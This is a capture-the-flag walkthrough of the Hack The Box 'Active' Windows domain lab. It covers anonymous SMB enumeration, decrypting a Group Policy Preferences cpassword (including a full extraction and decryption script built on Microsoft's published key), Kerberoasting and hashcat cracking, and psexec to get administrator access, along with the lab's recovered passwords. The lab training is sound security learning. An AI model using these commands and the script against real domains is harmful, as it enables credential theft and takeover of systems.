Active Walkthrough

Hack the Box Windows Active Directory machine. Rated as easy by the HTB community.

Initial Recon

Let’s get a big-picture overview of the environment by running rustscan. It finds the open ports quickly and hands them to nmap (everything after the `--`) for default script and version scans, which gives us the information we need to start the pentest.

rustscan -a 10.129.145.211 --ulimit 5000 -- -sC -sV

We see port 88 (Kerberos) and port 389 (LDAP), so we can confirm this is an Active Directory (AD) machine.

Lightweight Directory Access Protocol (LDAP) reveals the domain name active.htb. We should add this to our /etc/hosts file, just as we would when we find the domain name of a web app on Linux machines.

LDAP is an application protocol for accessing and maintaining distributed directory information services over an IP network. Active Directory is the actual directory service (the database and the management service) that speaks the LDAP language.

SMB Share Enumeration

Whenever SMB is available, I like to start my enumeration there first. If shares are readable, we can get a lot of information on the system, the users, applications, and possibly even cleartext credentials. To identify which shares are available and which ones we can read as an anonymous user, let’s use the tool smbmap.

smbmap -H active.htb

This provides the most actionable results and the clearest view of the available shares, because it lists each share together with our access level on it. smbclient -L would only list the shares and we would have to try connecting to each one, whereas smbmap immediately shows that there is exactly one share we can access as an anonymous user.

Now we can use smbclient to connect to the Replication share.

smbclient \\\\10.129.145.211\\Replication

I found that this share had many directories and files, and I had to keep navigating and writing down which ones I had already visited. I searched for a way to recursively search the share with smbclient but did not find what I was looking for. smbmap provides a better way to do this, which is quicker and provides the visual “tree map” I was looking for.

smbmap -r Replication/ -H 10.129.145.211 --depth 100 # probably didn't need 100 but it did the job

After doing some research I found out that the file Groups.xml, particularly on older versions of Windows like Server 2008 (which is the target machine), poses a huge security risk. When an administrator used Group Policy Preferences (GPP) on Windows Server 2008 (and R2) to create or update Local User and Group settings on domain-joined machines, for example to set a standard local administrator password, the password was stored in Groups.xml in an attribute called cpassword. The value is AES-256 encrypted, but Microsoft published the key in its own documentation, so anyone who can read the file (and this share is readable anonymously) can recover the cleartext. Microsoft removed the ability to store passwords this way with MS14-025, but the patch does not clean up Groups.xml files that were already written, which is why they are still worth hunting for on SYSVOL and its replicas.

We can download this file to our kali machine.

smbmap -h # check which option is needed to download a file (-A)
smbmap -r Replication/ -H 10.129.145.211 --depth 100 -A Groups.xml

The output tells us where it downloaded the file: /root/HTB/Active/10.129.145.211-Replication_active.htb_Policies_{31B2F340-016D-11D2-945F-00C04FB984F9}_MACHINE_Preferences_Groups_Groups.xml

I’m going to move it to our working directory and then read the contents with xmllint, a command-line tool for parsing, validating, converting, and formatting XML documents. This should make it slightly more readable.

mv /root/HTB/Active/10.129.145.211-Replication_active.htb_Policies_{31B2F340-016D-11D2-945F-00C04FB984F9}_MACHINE_Preferences_Groups_Groups.xml .

cat 10.129.145.211-Replication_active.htb_Policies_\{31B2F340-016D-11D2-945F-00C04FB984F9\}_MACHINE_Preferences_Groups_Groups.xml | xmllint --format -

We get the user “SVC_TGS” (the userName attribute) and the cpassword attribute: ”edBSHOwhZLTjt/QS9FeIcJ83mjWA98gw9guKOhJOdcqh+ZGMeXOsQbCpZ3xUjTLfCuNH8pG5aSVYdYw/NglVmQ”

Now we need to decrypt this value, and we can use gpp-decrypt for that. gpp-decrypt is a utility specifically designed to decrypt the cpassword (or “cipher-password”) attribute found in Group Policy Preferences (GPP) XML files on a Windows domain. It uses the AES-256 key that Microsoft published, so this is a straight decryption and no cracking is involved.

gpp-decrypt edBSHOwhZLTjt/QS9FeIcJ83mjWA98gw9guKOhJOdcqh+ZGMeXOsQbCpZ3xUjTLfCuNH8pG5aSVYdYw/NglVmQ

We get the cleartext password: GPPstillStandingStrong2k18.
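To show what gpp-decrypt is actually doing with that cpassword, here is an added example (not part of the original walkthrough, and not the gpp-decrypt tool itself) that parses a Groups.xml and decrypts every cpassword it finds. The function names gpp_extract, gpp_decrypt and gpp_demo, and the cut-down SAMPLE_GROUPS_XML (which only reuses the cpassword shown above), are assumptions made for this example. It needs base64, openssl and iconv, all of which are present on a default Kali install.

```shell
#!/usr/bin/env bash
# Added example: parse a Groups.xml and decrypt its cpassword the way gpp-decrypt does.
# Function names (gpp_extract, gpp_decrypt, gpp_demo) and SAMPLE_GROUPS_XML are
# assumptions made for this example; they are not part of the original walkthrough.
# Requires base64, openssl and iconv.
set -eu

# AES-256 key Microsoft published for GPP cpassword. Every cpassword on every
# domain is encrypted with this same key, which is the whole problem.
GPP_AES_KEY='4e9906e8fcb66cc9faf49310620ffee8f496e806cc057990209b09a433b66c1b'
ZERO_IV='00000000000000000000000000000000'   # GPP uses an all-zero 16-byte IV

# Constructed sample: same shape as a real Groups.xml, with the cpassword from the
# walkthrough and everything else trimmed down.
SAMPLE_GROUPS_XML='<?xml version="1.0" encoding="utf-8"?>
<Groups>
  <User name="active.htb\SVC_TGS">
    <Properties action="U" cpassword="edBSHOwhZLTjt/QS9FeIcJ83mjWA98gw9guKOhJOdcqh+ZGMeXOsQbCpZ3xUjTLfCuNH8pG5aSVYdYw/NglVmQ" userName="active.htb\SVC_TGS"/>
  </User>
</Groups>'

# stdin: Groups.xml. Prints "userName cpassword" for each Properties element that
# carries a non-empty cpassword, whatever order the attributes appear in.
gpp_extract() {
  tr '<' '\n' | grep 'cpassword="[^"]' | while IFS= read -r elem; do
    user=$(printf '%s\n' "$elem" | sed -n 's/.*userName="\([^"]*\)".*/\1/p')
    cpw=$(printf '%s\n' "$elem" | sed -n 's/.*cpassword="\([^"]*\)".*/\1/p')
    printf '%s %s\n' "$user" "$cpw"
  done
}

# $1: cpassword value. GPP strips the base64 '=' padding, so restore it, then
# AES-256-CBC decrypt with the public key and zero IV; the plaintext is UTF-16LE.
gpp_decrypt() {
  local cpw=$1 pad
  pad=$(( (4 - ${#cpw} % 4) % 4 ))
  while [ "$pad" -gt 0 ]; do cpw="${cpw}="; pad=$((pad - 1)); done
  printf '%s' "$cpw" | base64 -d \
    | openssl enc -d -aes-256-cbc -K "$GPP_AES_KEY" -iv "$ZERO_IV" \
    | iconv -f UTF-16LE -t UTF-8
}

# Walk every cpassword in the sample and print the recovered credential.
gpp_demo() {
  printf '%s' "$SAMPLE_GROUPS_XML" | gpp_extract | while read -r user cpw; do
    printf '%s => %s\n' "$user" "$(gpp_decrypt "$cpw")"
  done
}

# Stand-alone run (skipped if openssl is not installed).
command -v openssl >/dev/null 2>&1 && gpp_demo
```

Point the same two functions at a real Groups.xml with `gpp_extract < Groups.xml` and the loop from gpp_demo; the other GPP preference files (ScheduledTasks.xml, Services.xml, DataSources.xml, Drives.xml, Printers.xml) use the identical cpassword attribute, so the decryption step is the same for all of them.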

Looking back at our initial scan, we have an HTTP port open that leads to nothing, and then SMB again, which had multiple non-default shares of which we could only read one, Replication. The default shares are the ones whose names end in $. We can use these credentials to run smbmap again as an authenticated user and see whether we have read access to more shares.

smbmap -H active.htb -u SVC_TGS -p GPPstillStandingStrong2k18

We now have read access to every non-default share.

Searching recursively with smbmap we find the user.txt file.

smbmap -H active.htb -u SVC_TGS -p GPPstillStandingStrong2k18 -r Users --depth 100

Need to download it to submit the local flag.

smbmap -H active.htb -u SVC_TGS -p GPPstillStandingStrong2k18 -A user.txt -r Users --depth 100

Apart from the flag, there are no other interesting files.

Service Accounts

Whenever we get hold of domain credentials it is worth running the impacket tools. In this case we will use GetUserSPNs.py to find accounts that have a Service Principal Name (SPN) set and request a service ticket (TGS) for each of them. Part of that ticket is encrypted with a key derived from the service account’s password, so any domain user can request it and then try to crack it offline; this is Kerberoasting.

GetUserSPNs.py -request -dc-ip 10.129.145.211 active.htb/SVC_TGS

Now we can use hashcat to crack the hash. We must add it to a file, identify the hash mode number, and then run hashcat.

echo '$krb5tgs$23$*Administrator$ACTIVE.HTB$active.htb/Administrator*$bb15c85193ab32f2a5feee74c61c5297$...' > hash.txt

The $krb5tgs$23$ prefix tells us the ticket is RC4-HMAC encrypted (etype 23), which is hashcat mode 13100. Run hashcat with the wordlist as a positional argument (in hashcat, -w sets the workload profile, not the wordlist):

hashcat -m 13100 hash.txt /usr/share/wordlists/rockyou.txt

We get the password for the Administrator user: Ticketmaster1968. We could use this

Root

Now that we have these credentials we can run psexec.py. This impacket tool needs three things: the account must be a local administrator on the target, SMB must be reachable, and the account must be able to write to an administrative share (ADMIN$ by default, which is where psexec.py uploads its service executable) and create a service on the host through the Service Control Manager over SMB.

psexec.py active.htb/Administrator:'Ticketmaster1968'@10.129.145.211

Pwn3d!